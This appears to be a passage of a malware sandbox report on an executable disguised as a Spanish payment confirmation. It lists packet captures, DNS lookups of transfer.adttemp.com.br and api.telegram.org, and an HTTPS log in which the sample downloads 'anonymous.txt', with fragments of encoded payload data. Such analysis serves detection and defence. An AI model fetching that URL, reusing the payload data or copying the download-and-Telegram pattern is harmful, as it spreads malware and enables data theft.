Sep 25, 2024 18:51:23.815407991 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.889084101 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.889163017 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.889306068 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.889321089 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.889478922 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.889516115 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.889525890 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.889595032 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.889595032 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.907906055 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.908082008 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.908236980 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.908257961 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.949454069 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.979186058 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.979358912 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.979448080 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.979551077 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.979593992 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.979593992 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.979602098 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.979667902 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.980428934 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.980562925 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.980972052 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.981070995 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.997874022 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.997991085 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.998035908 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.998048067 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.998060942 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.999010086 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.999088049 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.999095917 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.043268919 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.066113949 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.066241026 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.066329956 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.066365004 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.066365004 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.066380978 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.066421986 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.066421986 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.067106962 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.067514896 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.067948103 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.068124056 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.068751097 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.068886995 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.068955898 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.068955898 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.068967104 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.069777012 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.069891930 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.069899082 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.069926023 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.069986105 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.069991112 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.070040941 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.070615053 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.070697069 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.070739985 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.070799112 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.084872007 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.084904909 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.084939003 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.084947109 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.085014105 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.085027933 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.085108042 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.085524082 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.085671902 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.154567003 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.154818058 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.154889107 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.154895067 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.154895067 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.154917955 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.155065060 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.155320883 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.155412912 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.155457973 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159040928 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159245014 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159317017 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.159317017 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.159348011 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159406900 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.159413099 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159454107 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159545898 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.159550905 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159727097 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159801960 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.159832001 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159861088 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159914017 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.159919024 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.159934998 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.160007000 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.160060883 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.160075903 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.160075903 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.160080910 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.160103083 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.173372030 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.173527002 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.173536062 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.173796892 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.173835993 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.173855066 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.173867941 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.173885107 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.174010992 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.174041033 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.174067974 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.174086094 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.174101114 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.174413919 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.174472094 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.174494028 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.174500942 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.174690008 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.174792051 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.174870968 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.174876928 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.174930096 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.242969990 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.243027925 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.243057013 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.243130922 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.243154049 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.243223906 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.243223906 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.243539095 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.243604898 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.243648052 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.243648052 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.243663073 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.243707895 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.243774891 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.243807077 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.243814945 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.243834019 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.244065046 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.244136095 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.244164944 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.244174004 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.244190931 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.244463921 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.244550943 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.244556904 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.244568110 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.244636059 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.244637966 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.244688988 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.244695902 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.245039940 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.245091915 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.245098114 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.245217085 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:24.245287895 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:24.245301962 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
                                              Sep 25, 2024 18:51:24.245363951 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245450020 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.245455980 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245508909 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.245515108 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.245686054 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.247817039 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.247878075 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.247910976 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.247920036 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.247946024 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.247993946 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.247993946 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.248002052 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.248047113 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.248076916 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.248111010 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.248148918 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.248156071 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.248164892 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.262011051 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.262146950 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.262300968 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.262300968 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.262321949 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.262517929 CEST44349704104.196.109.209192.168.2.8
                                              Sep 25, 2024 18:51:24.262617111 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:24.283703089 CEST49704443192.168.2.8104.196.109.209
                                              Sep 25, 2024 18:51:26.012808084 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.012862921 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.013207912 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.016957998 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.016973972 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.636127949 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.636344910 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.641592979 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.641607046 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.641875982 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.683952093 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.688114882 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.731446028 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.949842930 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:26.950191975 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:26.950232029 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:27.695590973 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:27.695806980 CEST44349705149.154.167.220192.168.2.8
                                              Sep 25, 2024 18:51:27.695883989 CEST49705443192.168.2.8149.154.167.220
                                              Sep 25, 2024 18:51:27.717973948 CEST49705443192.168.2.8149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 18:51:22.810648918 CEST | 60480 | 53 | 192.168.2.8 | 1.1.1.1
Sep 25, 2024 18:51:22.977866888 CEST | 53 | 60480 | 1.1.1.1 | 192.168.2.8
Sep 25, 2024 18:51:26.000494003 CEST | 58848 | 53 | 192.168.2.8 | 1.1.1.1
Sep 25, 2024 18:51:26.007617950 CEST | 53 | 58848 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 25, 2024 18:51:22.810648918 CEST | 192.168.2.8 | 1.1.1.1 | 0x48c4 | Standard query (0) | transfer.adttemp.com.br | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:51:26.000494003 CEST | 192.168.2.8 | 1.1.1.1 | 0xb0c | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 25, 2024 18:51:22.977866888 CEST | 1.1.1.1 | 192.168.2.8 | 0x48c4 | No error (0) | transfer.adttemp.com.br | | 104.196.109.209 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 18:51:26.007617950 CEST | 1.1.1.1 | 192.168.2.8 | 0xb0c | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                              • transfer.adttemp.com.br
                                              • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 104.196.109.209 | 443 | 3020 | C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 16:51:23 UTC | 92 | OUT | GET /cCoB5/anonymous.txt HTTP/1.1
    Host: transfer.adttemp.com.br
    Connection: Keep-Alive
2024-09-25 16:51:23 UTC | 312 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 16:51:23 GMT
    Server: Transfer.sh HTTP Server 1.0
    Content-Disposition: attachment; filename="anonymous.txt"
    Content-Length: 320184
    Content-Type: text/plain; charset=utf-8
    X-Made-With: <3 by DutchCoders
    X-Served-By: Proudly served by DutchCoders
    Connection: close
                                              2024-09-25 16:51:23 UTC3784INData Raw: 66 4b 32 4e 61 51 78 48 56 59 5a 56 54 41 6f 2b 4e 65 4c 79 57 4e 6b 4c 67 47 45 66 74 62 47 65 73 48 52 63 61 77 39 41 46 64 57 72 67 35 48 6f 65 42 48 4b 79 4f 42 62 63 55 54 2b 65 71 7a 64 38 6e 76 6a 31 56 58 54 6b 33 6c 74 39 50 41 51 5a 44 7a 4d 73 65 52 31 44 69 44 65 75 43 47 77 69 69 57 57 53 50 48 41 73 55 54 32 50 79 79 35 77 7a 72 5a 36 46 5a 76 4f 59 6a 67 54 7a 53 30 4b 34 74 32 33 55 67 64 49 62 6e 50 38 6a 73 50 48 49 6c 6a 6c 6b 74 45 72 4e 5a 72 65 79 7a 5a 53 57 74 2f 2b 30 37 31 54 58 58 6f 6a 35 38 43 75 62 32 69 32 37 41 30 43 2f 51 30 35 30 52 71 41 2f 6c 51 33 4b 4e 75 34 6c 76 6a 69 67 71 38 34 6c 30 69 75 35 34 6b 4c 55 65 64 42 4b 4e 47 58 44 6f 7a 74 32 35 44 48 38 6e 31 48 43 63 47 57 6b 48 2f 2f 52 37 58 54 43 6c 7a 55 53 67
                                              Data Ascii: fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGesHRcaw9AFdWrg5HoeBHKyOBbcUT+eqzd8nvj1VXTk3lt9PAQZDzMseR1DiDeuCGwiiWWSPHAsUT2Pyy5wzrZ6FZvOYjgTzS0K4t23UgdIbnP8jsPHIljlktErNZreyzZSWt/+071TXXoj58Cub2i27A0C/Q050RqA/lQ3KNu4lvjigq84l0iu54kLUedBKNGXDozt25DH8n1HCcGWkH//R7XTClzUSg
                                              2024-09-25 16:51:23 UTC4408INData Raw: 2f 49 4f 4c 6e 6a 68 52 49 74 42 6c 6f 42 59 44 35 47 43 4e 4a 52 4f 76 56 5a 4a 53 43 7a 46 69 7a 4f 39 4d 4d 4a 43 65 37 70 6a 36 43 31 73 56 4a 55 55 38 63 71 46 54 4a 4e 66 48 42 2f 7a 33 4d 35 79 6d 62 6e 36 72 6b 38 6b 6a 4e 6d 79 74 4c 2f 70 49 54 76 72 5a 43 4b 42 73 49 33 72 4a 52 6c 6a 5a 73 2b 77 53 37 2b 6f 4e 35 76 6d 55 58 6b 43 47 6d 55 4b 71 2b 67 52 6d 75 2b 55 35 6d 4e 70 63 50 4d 68 78 76 4f 72 38 32 4c 37 71 6c 49 62 47 6e 75 36 33 42 56 38 76 75 57 6e 42 77 79 62 52 59 74 44 6c 7a 7a 55 57 42 66 78 62 77 55 41 52 4a 34 4d 32 4b 30 56 58 7a 4f 46 53 59 32 55 67 56 37 4a 62 6a 2f 53 51 36 48 36 43 44 79 43 44 5a 69 75 4c 4b 39 43 38 53 7a 44 56 35 67 6b 42 2b 68 41 45 50 31 58 42 62 72 73 59 78 65 5a 4d 33 74 6e 49 41 78 79 4a 32 56 38
                                              Data Ascii: /IOLnjhRItBloBYD5GCNJROvVZJSCzFizO9MMJCe7pj6C1sVJUU8cqFTJNfHB/z3M5ymbn6rk8kjNmytL/pITvrZCKBsI3rJRljZs+wS7+oN5vmUXkCGmUKq+gRmu+U5mNpcPMhxvOr82L7qlIbGnu63BV8vuWnBwybRYtDlzzUWBfxbwUARJ4M2K0VXzOFSY2UgV7Jbj/SQ6H6CDyCDZiuLK9C8SzDV5gkB+hAEP1XBbrsYxeZM3tnIAxyJ2V8
                                              2024-09-25 16:51:23 UTC3592INData Raw: 6c 6c 2f 4a 32 4d 6d 43 61 6e 38 31 6a 73 71 50 42 4f 53 53 42 51 37 51 46 4a 76 78 43 2b 61 35 4f 6a 7a 4f 69 6f 58 6f 62 72 53 54 4a 41 65 6b 54 46 4d 36 42 53 63 51 35 54 5a 52 64 47 67 41 63 5a 35 7a 74 67 69 6f 42 4b 56 34 39 6e 32 53 45 52 75 70 32 66 4d 6e 6e 69 39 2f 38 4c 4c 4a 6e 45 49 45 57 54 6c 42 2f 51 44 6c 70 4a 73 51 77 57 46 30 62 64 41 4e 63 57 52 58 31 4d 69 48 51 34 42 54 6f 66 68 4b 4a 6a 4d 33 54 62 52 32 75 34 48 6b 48 30 30 67 4b 35 64 69 42 6c 2b 45 70 49 61 31 55 74 64 47 6d 62 52 74 33 69 38 68 6b 65 52 30 78 73 71 73 63 4a 45 33 64 46 39 52 6e 67 66 4a 69 66 73 4a 36 77 78 6d 51 78 4c 5a 6f 68 73 69 31 45 66 50 2b 78 52 67 6c 30 53 38 47 79 75 55 49 2b 69 37 2b 36 79 30 6f 34 62 6d 56 32 64 5a 68 56 78 4e 36 58 38 5a 4a 73 6e
                                              Data Ascii: ll/J2MmCan81jsqPBOSSBQ7QFJvxC+a5OjzOioXobrSTJAekTFM6BScQ5TZRdGgAcZ5ztgioBKV49n2SERup2fMnni9/8LLJnEIEWTlB/QDlpJsQwWF0bdANcWRX1MiHQ4BTofhKJjM3TbR2u4HkH00gK5diBl+EpIa1UtdGmbRt3i8hkeR0xsqscJE3dF9RngfJifsJ6wxmQxLZohsi1EfP+xRgl0S8GyuUI+i7+6y0o4bmV2dZhVxN6X8ZJsn
                                              2024-09-25 16:51:23 UTC4600INData Raw: 32 43 42 76 57 69 72 58 50 61 67 62 44 6f 34 32 7a 35 67 61 38 6b 61 37 74 4e 69 48 79 45 57 45 35 55 48 2f 36 73 64 4a 4c 49 57 6c 77 61 37 4e 49 47 4d 53 35 69 73 63 74 45 49 54 65 37 56 49 62 41 72 35 42 49 79 39 4c 50 42 70 41 47 37 5a 6c 79 74 33 56 4f 38 62 2b 42 2b 63 2f 38 53 32 48 7a 41 77 35 68 50 32 63 6f 48 47 4e 36 6c 50 4f 35 49 43 6a 72 42 70 6f 58 41 4d 63 4b 4a 4d 6d 4b 4d 59 2f 4f 35 2b 41 46 39 66 78 79 79 30 52 66 32 7a 55 79 68 70 70 43 6e 43 36 59 43 78 6d 33 37 38 55 6b 2b 6e 44 4b 6f 53 6e 45 58 33 65 56 2f 53 41 45 68 6d 72 31 4e 4a 6d 63 56 35 65 69 69 66 4a 33 73 68 2f 35 49 74 64 6a 7a 64 48 4e 37 2f 55 5a 67 71 6c 54 77 74 31 73 30 71 33 68 55 72 4f 74 47 59 77 6d 51 4e 48 7a 49 58 63 44 4b 46 36 48 6d 53 34 4e 74 57 52 32 59
